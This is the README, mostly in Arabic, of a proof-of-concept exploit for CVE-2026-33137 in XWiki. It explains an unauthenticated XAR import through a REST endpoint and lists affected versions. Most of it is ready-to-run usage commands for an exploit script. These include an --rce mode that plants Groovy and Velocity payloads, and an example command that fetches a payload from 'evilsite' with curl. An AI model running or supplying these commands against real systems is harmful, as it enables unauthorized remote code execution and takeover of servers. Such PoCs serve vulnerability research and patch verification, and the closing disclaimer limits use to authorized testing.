
XWiki Platform - CVE-2026-33137 PoC - Unauthenticated XAR Import via REST /wikis/{wikiName}
منصة XWiki - استيراد XAR غير مصادق عليه عبر REST /wikis/{wikiName}
تنفّذ نقطة نهاية REST API الخاصة بـ POST /wikis/{wikiName} في منصة XWiki استيراد XAR (أرشيف XWiki) دون إجراء أي فحوصات مصادقة أو تفويض. يمكن لمهاجم غير مصادق عليه إنشاء أو تحديث مستندات عشوائية في الويكي المستهدف عن طريق إرسال ملف XAR مُعدّ بعناية.
AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N| الحالة | الإصدارات |
|---|---|
| متأثر | > 15.10.16, > 16.4.6, > 16.10.2 |
| مُصلَّح | 16.10.17, 17.4.9, 17.10.3, 18.0.1, 18.1.0-rc-1 |
يمكن لمهاجم غير مصادق عليه:
تقبل نقطة نهاية REST POST /xwiki/rest/wikis/{wikiName} ملف XAR في نص الطلب وتستورده مباشرةً إلى الويكي دون التحقق مما إذا كان مقدّم الطلب يمتلك صلاحيات ADMIN. يضيف الإصلاح (commit 4b7b95b) فحص تفويض باستخدام ContextualAuthorizationManager.checkAccess(Right.ADMIN, ...).
# Install requirements
pip install requests
# Basic usage
python poc.py -t http://target:8080
# Specify wiki, space, and page names
python poc.py -t http://target:8080 -w xwiki -s MySpace -p MyPage
# Probe the target first
python poc.py -t http://target:8080 --probe
# Use a proxy (e.g., Burp Suite)
python poc.py -t http://target:8080 --proxy http://127.0.0.1:8080
# Custom content
python poc.py -t http://target:8080 -c "Proof of Concept"
# RCE mode: execute a command on the target server
python poc.py -t http://target:8080 --rce "id"
# RCE with authenticated triggering (if credentials are available)
python poc.py -t http://target:8080 --rce "curl http://evilsite/payload" -u admin --password pass
--rce)يستورد الخيار --rce صفحات تحتوي على حمولات Groovy وVelocity تنفّذ نص الأمر المحدد. ويقوم تلقائيًا بما يلي:
{{groovy}} و{{velocity}}متطلبات نجاح RCE:
-u / --password)package.xml - واصف الحزمة{Space}/{Page}.xml - مستند XML مع المحتوىتم توفير هذا الـ PoC لأغراض تعليمية واختبار أمني مصرّح به فقط. الاستخدام غير المصرح به لأداة الاستغلال هذه ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها يعد أمرًا غير قانوني. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.